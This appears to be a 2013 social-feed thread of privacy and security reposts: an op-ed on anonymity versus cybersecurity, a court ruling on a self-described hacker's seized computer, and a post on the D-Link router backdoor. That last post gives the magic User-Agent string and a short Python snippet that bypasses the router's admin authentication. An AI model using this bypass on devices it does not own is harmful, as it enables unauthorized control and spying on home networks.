To “suggest the only way to protect against cyber crime is to sacrifice privacy and civil liberties is absurd,” Nick Pickles, director of privacy campaign group Big Brother Watch, told TechWeekEurope. “It is a simple fact that if data has not been collected, it cannot be stolen, lost or misused. The best safeguard for consumers and businesses is for data not to be collected unless it is absolutely essential, and then deleted as soon as it is no longer required.”


As for his complaints about anonymity? It's pretty much all or nothing. You can't whip up statutes and laws that grant anonymity and its privacy protections to everyone except criminals. Either you take the good with the bad or you eliminate it for everybody. No one's going to agree with that last one, so security groups and companies will just have to deal with the fact that their adversaries will be cloaking their identities. Cops may wish robbers wouldn't wear masks when committing crimes, but that's the way it goes. You can't ban the sale of masks simply because someone holds up a bank wearing one.

I'm sure he understands this, but he's in a field where security is valued over privacy. That's the expected mindset for someone in his position. The problem is that those with his mindset expect others to come to the same conclusion -- and when they don't, they're portrayed as part of the problem.

To be fair, Coviello at least had this to say about the jargon being deployed by government security officials and advisors.

"I absolutely hate the term 'Cyber Pearl Harbor'," he said. "I just think it's a poor metaphor to describe the state we are really in. What do I do differently once I've heard it? And I've been hearing it for 10 years now. To trigger a physically destructive event solely from the internet might not be impossible, but it is still, as of today, highly unlikely."


Coviello may not like this particular FUD, but claiming anonymity and privacy are standing in the way of security isn't that far removed from the panicky assertions of the "cyber Pearl Harbor" types.

Source

#Anonymity #Privacy #Freedom #Liberty #RSA #Encryption #Security #Intelligence @LibertyPod
Sean Tilley
  
WAR IS PEACE
FREEDOM IS SLAVERY
IGNORANCE IS STRENGTH

Seth Martin
  last edited: Tue, 22 Oct 2013 13:00:26 -0500  
Call Yourself A Hacker, Lose Your 4th Amendment Rights

Image/photo

The US District Court for the State of Idaho ruled that an ICS product developer’s computer could be seized without him being notified or even heard from in court primarily because he states on his web site “we like hacking things and don’t want to stop”.


#Hacker #Hacking #Cybersecurity #National Security #Visdom #Southfork Security #Seizure #Privacy #Security #Constitution #Rights @LibertyPod

Seth Martin
  
After seeing news of a D-Link backdoor over the last couple of days, I finally decided to check it out. The backdoor, if used, would let an attacker take complete control of a router or modem and spy on a home's browsing activity.
Reverse Engineering a D-Link Backdoor - /dev/ttyS0


Image/photo

In other words, if your browser’s user agent string is “xmlset_roodkcableoj28840ybtide” (no quotes), you can access the web interface without any authentication and view/change the device settings
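
On a device you own, the claim is easy to test: send a request with that exact User-Agent and see whether the admin interface answers without credentials. A minimal sketch with the third-party requests package; the router address is a placeholder:

[code]
# A minimal sketch for testing *your own* device: request the admin page
# with the magic User-Agent and compare against a normal request.
# 192.168.0.1 is a placeholder for the router's address.
import requests

url = "http://192.168.0.1/"
backdoor_ua = {"User-Agent": "xmlset_roodkcableoj28840ybtide"}

normal = requests.get(url, timeout=5)
magic = requests.get(url, headers=backdoor_ua, timeout=5)

# On affected firmware, the second response is the settings interface
# with no authentication prompt.
print("normal:", normal.status_code, "with UA:", magic.status_code)
[/code]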


#Reverse Engineering #D-Link #Router #Security #Fail #Backdoor #Spying #Spy
Arto
  
Sneaky, criminal bastards.
Thomas Willingham
  
I do stuff like this quite a lot.  Take an argument from the URL in some conditional, and debugging is a lot quicker, at the expense of a slightly longer testing process when it's removed.

This strikes me as something similar.  I mean, it's not exactly clever.  I'd be inclined to give them the benefit of the doubt if they called this a bug.  

It's still incompetent.  I still wouldn't use their hardware, but I don't think this is a deliberate backdoor for spying... if I were going for a deliberate backdoor for spying, it'd be a lot more subtle than that.
Haakon Meland Eriksen
  
The explanation by the article author is very good. :-)
Arto
 
Indeed!